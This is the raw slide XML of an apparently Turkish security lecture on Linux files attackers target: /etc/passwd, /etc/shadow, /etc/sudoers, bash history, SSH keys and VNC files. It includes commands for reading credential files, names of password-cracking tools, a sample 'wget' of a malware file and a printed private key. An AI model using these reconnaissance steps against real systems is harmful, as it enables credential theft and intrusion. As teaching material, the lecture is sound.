                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458;p59"/>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Ubuntu 20.04.3 LTS \n \l</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Google Shape;459;p59"/>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/etc/issue</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Google Shape;460;p59"/>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Sistemdeki işletim sistemi bilgilerinin ve sürüm numarasının görüntülendiği bir sistem dosyasıdır.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bilgiler genellikle oturum açma ekranlarında ve uzaktan bağlantı araçlarında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/etc/issue dosyası, sahte oturum açma ekranları oluşturmak için</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>kullanılabilir.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Hackerlar, bu dosyadaki bilgileri kullanarak güvenli bir sayfa gibi görünen sahte oturum açma ekranları oluşturabilir ve kullanıcıların kimlik bilgilerini çalabilir.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4" name="Shape 464"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Google Shape;465;p60"/>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Kullanıcı hesapları hakkında bilgi edinme</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Google Shape;466;p60"/>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root:x:0:0:root:/root:/bin/bash</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daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin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bin:x:2:2:bin:/bin:/usr/sbin/nologin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sys:x:3:3:sys:/dev:/usr/sbin/nologin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sync:x:4:65534:sync:/bin:/bin/sync</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games:x:5:60:games:/usr/games:/usr/sbin/nologin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man:x:6:12:man:/var/cache/man:/usr/sbin/nologin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lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Google Shape;467;p60"/>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/etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="Google Shape;468;p60"/>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/etc/passwd dosyasındaki kullanıcı adları ve kimlik numaraları, hedef sistemin yapılandırması hakkında bilgi sağlayabilir.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bilgiler, bir </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>hacker'ın hedef sistemi daha iyi anlamasına</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> yardımcı olabilir.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Örneğin, /etc/passwd dosyasındaki şifreleri kırmak için brute force saldırıları yapabilir veya şifreleme yöntemlerindeki güvenlik açıklarını kullanarak şifreleri çözebilir.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2" name="Shape 472"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="Google Shape;473;p6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Kullanıcı hesapları hakkında bilgi edinme</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Google Shape;474;p61"/>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root:x:0:0:root:/root:/bin/bash</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daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin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bin:x:2:2:bin:/bin:/usr/sbin/nologin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sys:x:3:3:sys:/dev:/usr/sbin/nologin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sync:x:4:65534:sync:/bin:/bin/sync</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games:x:5:60:games:/usr/games:/usr/sbin/nologin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man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</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lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Google Shape;475;p61"/>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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>$ cat /etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="476" name="Google Shape;476;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4397000" y="679925"/>
            <a:ext cx="4552351" cy="3218654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Google Shape;477;p6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https://www.stratosphereips.org/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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1" name="Shape 481"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Google Shape;482;p62"/>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Kullanıcı şifreleri ele geçirme</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Google Shape;483;p62"/>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daemon:*:18123:0:99999:7:::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bin:*:18123:0:99999:7:::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sys:*:18123:0:99999:7:::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sync:*:18123:0:99999:7:::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games:*:18123:0:99999:7:::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lp:*:18123:0:99999:7:::</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Google Shape;484;p62"/>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/etc/shadow</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Google Shape;485;p62"/>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Linux sistemlerinde kullanıcı hesaplarına ait şifrelerin tutulduğu bir sistem dosyasıdır.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/etc/passwd dosyasındaki kullanıcı hesaplarına ait şifrelerin yerini almıştır.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Şifreleme biçiminde şifreleri daha güvenli bir şekilde saklar.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Her bir kullanıcı hesabının şifresi ayrı bir satırda görüntülenmiştir.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Saldırı araçları: Hashcat, John the Ripper, Hydra</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9" name="Shape 489"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Google Shape;490;p6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Kullanıcı şifrelerini ele geçirme</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Google Shape;491;p63"/>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daemon:*:18123:0:99999:7:::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bin:*:18123:0:99999:7:::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sys:*:18123:0:99999:7:::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sync:*:18123:0:99999:7:::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games:*:18123:0:99999:7:::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man:*:18123:0:99999:7:::</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lp:*:18123:0:99999:7:::</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Google Shape;492;p63"/>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/etc/shadow</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="493" name="Google Shape;493;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386475" y="679925"/>
            <a:ext cx="4641377" cy="2524650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Google Shape;494;p6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4"/>
              </a:rPr>
              <a:t>https://www.stratosphereips.org/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2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8" name="Shape 498"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Google Shape;499;p64"/>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Root yetkisine sahip kullanıcıların keşfedilmesi</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Google Shape;500;p64"/>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john ALL=(ALL) ALL</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Google Shape;501;p64"/>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/etc/sudoers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Google Shape;502;p64"/>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/etc/sudoers dosyası, bir Linux sistemi üzerinde sudo komutunu kullanma izni veren yapılandırma dosyasıdır.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dosya, sistem yöneticileri tarafından düzenlenir ve genellikle root kullanıcısının ayrıcalıklarını diğer kullanıcılara genişletmek için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/etc/sudoers dosyasında, hangi kullanıcıların sudo komutunu kullanabileceği, hangi komutların kullanılabileceği, hangi kullanıcılara hangi yetkilerin </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>verildiği</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> gibi bilgiler belirtilir.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6" name="Shape 506"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Google Shape;507;p6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Komut günlüklerinden zafiyet keşfi</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Google Shape;508;p65"/>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ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>myserver@192.168.0.1</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sudo apt-get update</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sudo apt-get upgrade</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sudo systemctl restart apache2</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cat /var/log/syslog | grep error</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nano /etc/ssh/sshd_config</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systemctl restart sshd.service</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ping google.com</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000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>wget https://example.com/malware.exe</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sudo apt-get install python3-pip</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pip3 install requests</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ssh user@10.0.0.1</a:t>
            </a:r>
            <a:endParaRPr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mysql -u root -p</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> mydatabase</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psql -h mydbhost -U </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>myuser mydatabase</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="10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lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh -i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>mykey.pem ec2-user@ec2-1-2-3-4.compute-1.amazonaws.comba</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Google Shape;509;p65"/>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~/.bash_history</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Google Shape;510;p65"/>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Bash kabuğunda çalıştırılan komutların geçmişini tutan bir dosyadır.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Her komut otomatik olarak bu dosyaya kaydedilir ve daha sonra tekrar çağrılabilir.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İzinler yalnızca kullanıcının kendisi tarafından okunabilir ve yazılabilir olmalıdır.Düzenli olarak temizlenmeli veya gizlenmelidir.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Saldırgan, sistemdeki zayıf noktaları belirleyebilir ve sisteme erişim sağlayabilir. Kullanıcı adı, parola gibi hassas bilgileri ele geçirerek başka saldırı yöntemleri uygulayabilir.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 name="Shape 66"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Google Shape;67;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="37488" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2764626" y="1062000"/>
            <a:ext cx="3614750" cy="339959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14" name="Shape 514"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Google Shape;515;p6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Secure shell (ssh) dosyaları</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Google Shape;516;p66"/>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-----BEGIN RSA PRIVATE KEY-----</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MIIEowIBAAKCAQEAu1HfrYKsBc0CgkPpBvT7FHZ+Ck0b24FODSPW+yRvRbfwzAe</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OJU3OqsrNiNh6fWEh2edLPDo1q5lxqGJyrKgx+YBNO5F5k+jgrWnCJL7f+YY66zZ</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7VnJLOfo/Z/nyV4Y4m4yJLxNt54kFz57aZ/Uo9Zq+3qebKo5YimE5F5tKY1SP+Ov</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Kj0qu7zZlJp0B7KuOzC1g7V4y0ns2b7V+TXt94JZg57faEzS2JHnGvPxhYKfJc+K</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ehnJxvNlTl81Kg9XRErCuW8Nv6RJmXTVEw/2kOw+iNv+xy1W8NzN25eBbfN/pmsv</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oW+xmc8nBQxftVLjbwEfgnxNTW1y8iXhfnDpLwIDAQABAoIBAQDG8xE5xpbK+/lZ</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Yb5r3zqDXPc5h5n5m0+nQ4xr3m7mbIIZHzwA0Ubz/GwhiS8B9lfbyMry0u/z7i+b</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6TJWW7Vc0eNYuTGTXV/16L/8b6C2UOyfI0mZDJvADZAVmRKtvwQclh/lW8y8trvN</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BpKssvkLXYBYWumf8l+RZDWTfvwFTET/NHq3EKrQ2g5elFW/5H/9tqwj4yciQen4</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OsBwItbwHxJLpS7zRiMAd1Ph9puI9WZuT7TswczlTZZw7VxSENNn8U7YJL6TxuU6</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fmU/GklT0c7ZonogCwMf7aIj0UioYDbYm/l6U+2nxU0gqD4Q/WeZGifH/ct49x+j</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Nl/vdYRBAoGBAP1l9UTN5Wnm/W+RtM5kvh1C7LxShqg3Q2t+Hg5ueXo5/aWgb8dC</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700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Fgkdw</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="Google Shape;517;p6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~/.ssh/id_rsa</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Google Shape;518;p66"/>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Linux ve Unix sistemlerinde SSH için varsayılan ana dizin.</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Kullanıcının SSH anahtarlarını, yapılandırma dosyalarını ve diğer SSH dosyalarını saklamak için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Adının başında nokta işareti bulunması, dizinin gizli olduğunu gösterir.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Özel anahtarları içerir ve güvenli oturum açma için kullanılır.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Genellikle .pub veya .key uzantıları ile biten dosya isimleri kullanılır. Örnek dosya isimleri: ~/.ssh/id_rsa, ~/.ssh/id_dsa.</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2" name="Shape 522"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Google Shape;523;p6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Uzaktan erişim bilgileri</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Google Shape;524;p67"/>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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>total 16</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-rw-r--r--  1 user user  739 Mar 19 14:08 xstartup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-rw-------  1 user user  207 Mar 19 14:12 passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-rw-------  1 user user 1292 Mar 19 14:13 server01:1.pid</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-rw-------  1 user user 1165 Mar 19 14:12 server01:1.log</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
